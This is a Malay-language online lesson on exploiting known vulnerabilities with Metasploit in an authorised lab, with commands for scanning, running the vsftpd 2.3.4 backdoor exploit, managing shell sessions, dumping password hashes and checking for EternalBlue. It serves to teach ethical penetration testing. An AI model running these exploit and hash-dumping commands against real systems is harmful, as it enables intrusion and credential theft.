Cyber Security Academy · Pelajaran

Mengeksploitasi Kerentanan yang Diketahui

Gunakan modul eksploit terhadap sasaran yang terdedah dalam makmal; tafsirkan output sesi.

Pelajaran 2 daripada 413 langkah

Mengeksploitasi Kerentanan yang Diketahui ialah pelajaran Cyber Security Academy percuma di CoddyKit. Ini ialah pelajaran 2 daripada 4. Sebanyak 3 pelajaran dalam laluan pembelajaran ini boleh dibaca sepenuhnya secara percuma — selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan praktikal dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Pelajaran ini merupakan sebahagian daripada laluan pembelajaran Cyber Security Academy, dan kemajuan anda disegerakkan merentas web serta aplikasi CoddyKit. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Etika dan Kebenaran Diutamakan

Eksploitasi hanya sah terhadap sistem yang anda miliki atau yang anda mempunyai kebenaran bertulis yang jelas untuk mengujinya. Semua contoh di sini adalah untuk persekitaran makmal yang dibenarkan. Eksploitasi tanpa kebenaran ialah kesalahan jenayah.

Cadangan Persediaan Makmal

Gunakan VM yang sengaja dibuat rentan: Metasploitable2/3, DVWA, mesin VulnHub atau HackTheBox/TryHackMe untuk latihan yang sah. Jangan sekali-kali menguji sistem produksi atau dunia sebenar tanpa dokumen skop yang ditandatangani.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Peninjauan Sebelum Eksploitasi

Sentiasa lakukan enumerasi sebelum mengeksploitasi. Ketahui versi perkhidmatan, OS dan konteks yang tepat sebelum memilih eksploit. Versi yang salah = eksploit gagal atau sistem ranap.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Memilih Eksploit yang Tepat

Cari mengikut nama dan versi perkhidmatan. Utamakan modul yang mempunyai peringkat Cemerlang atau Hebat. Baca info untuk mengesahkan bahawa platform sasaran dan julat versinya sepadan.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Mengkonfigurasi dan Menjalankan Eksploit

Tetapkan RHOSTS (sasaran jauh), LHOST (IP anda untuk sambungan balik), LPORT (port pendengar), pilih muatan, kemudian jalankan. Perhatikan penciptaan sesi atau mesej ralat.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Mentafsir Hasil

Eksploit yang berjaya membuka sesi. Eksploit yang gagal memaparkan mesej ralat: sambungan ditolak (port tidak terbuka), eksploit gagal (versi salah), tiada sesi dicipta (muatan gagal menyambung semula).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Berinteraksi dengan Sesi

Selepas eksploitasi, berinteraksi dengan sesi menggunakan sessions -i . Sesi cangkerang arahan asas memberikan terminal; sesi Meterpreter menyediakan API yang kaya.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Menyimpan di Latar dan Mengurus Pelbagai Sesi

Tekan Ctrl+Z untuk menyimpan sesi di latar dan kembali ke msfconsole. Ini membolehkan anda mengurus beberapa sesi atau menjalankan modul pascaeksploitasi terhadap sesi tertentu.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Arahan Semakan

Banyak modul eksploit melaksanakan arahan check yang menguji sama ada sasaran rentan tanpa mengeksploitasinya. Sentiasa jalankan semakan terlebih dahulu jika tersedia.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Pertimbangan Kebolehpercayaan Eksploit

Eksploit boleh menyebabkan perkhidmatan ranap, mencetuskan amaran atau meninggalkan rekod. Dalam penilaian sistem produksi: jadualkan eksploit pada waktu trafik rendah, sediakan pelan pemulihan, dan sahkan bahawa sandaran wujud sebelum menjalankan apa-apa yang merosakkan.

Mendokumentasikan Eksploitasi

Catatkan: cap masa, IP dan port sasaran, modul eksploit yang digunakan, nombor CVE, muatan yang digunakan, sesi yang diperoleh dan bukti (tangkapan skrin atau keluaran terminal). Ini ialah bukti kerentanan anda untuk laporan.

Semakan Pantas

Apakah fungsi arahan "check" Metasploit?

Ringkasan: Mengeksploitasi Kerentanan

Eksploitasi beretika mengikut aliran yang jelas: dapatkan kebenaran bertulis, lakukan enumerasi dengan teliti, pilih eksploit yang sepadan, baca maklumat modul, jalankan semakan terlebih dahulu jika tersedia, laksanakan dan dokumentasikan semuanya. Jangan sekali-kali mengeksploitasi tanpa kebenaran — kemahiran teknikal dan batas etika tidak dapat dipisahkan.

Percuma untuk bermula

Pelajari Cyber Security Academy dengan tutor kecerdasan buatan — percuma

Tulis dan jalankan kod sebenar dalam pelayar anda, dapatkan bantuan segera daripada tutor kecerdasan buatan yang tersedia 24/7, dan sambung semula dari tempat anda berhenti di web atau dalam aplikasi.

Kursus
76
Pelajaran
303

Soalan Lazim

Adakah pelajaran “Mengeksploitasi Kerentanan yang Diketahui” percuma?

Ya — sebanyak 3 pelajaran dalam laluan pembelajaran Cyber Security Academy, termasuk “Mengeksploitasi Kerentanan yang Diketahui”, boleh dibaca sepenuhnya secara percuma di web ini. Selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan interaktif dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Apakah yang akan saya pelajari dalam “Mengeksploitasi Kerentanan yang Diketahui”?

Gunakan modul eksploit terhadap sasaran yang terdedah dalam makmal; tafsirkan output sesi. Anda berlatih Cyber Security Academy menggunakan kod praktikal yang dijalankan terus dalam pelayar, manakala tutor kecerdasan buatan 24/7 menjawab soalan anda semasa anda mengikuti pelajaran.

Adakah saya memerlukan pengalaman untuk memulakan Cyber Security Academy?

Tiada pengalaman terdahulu diperlukan. Pembelajaran Cyber Security Academy di CoddyKit disusun untuk pelajar daripada peringkat pemula hingga lanjutan, jadi anda boleh bermula di sini atau dari awal dan belajar mengikut kadar anda sendiri. Ini ialah pelajaran 2 daripada 4.

Berapa lamakah pelajaran “Mengeksploitasi Kerentanan yang Diketahui” diambil?

Kebanyakan pelajaran CoddyKit mengambil masa kira-kira 5–10 minit. Setiap pelajaran ringkas dan interaktif, jadi anda boleh membuat kemajuan secara berterusan dan menyambung tepat dari tempat anda berhenti di web atau aplikasi.

Bolehkah saya menulis dan menjalankan kod dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan penyunting kod terbina dalam, jadi anda boleh menulis dan menjalankan kod sebenar terus dalam pelayar serta menerima maklum balas kecerdasan buatan serta-merta — tanpa memerlukan persediaan setempat.

Semua pelajaran dalam kursus ini

  1. Seni Bina Metasploit dan msfconsole
  2. Mengeksploitasi Kerentanan yang Diketahui
  3. Muatan: Berperingkat berbanding Tanpa Peringkat, Meterpreter
  4. Selepas Eksploitasi: Berpindah dan Berkekalan
← Kembali ke Cyber Security Academy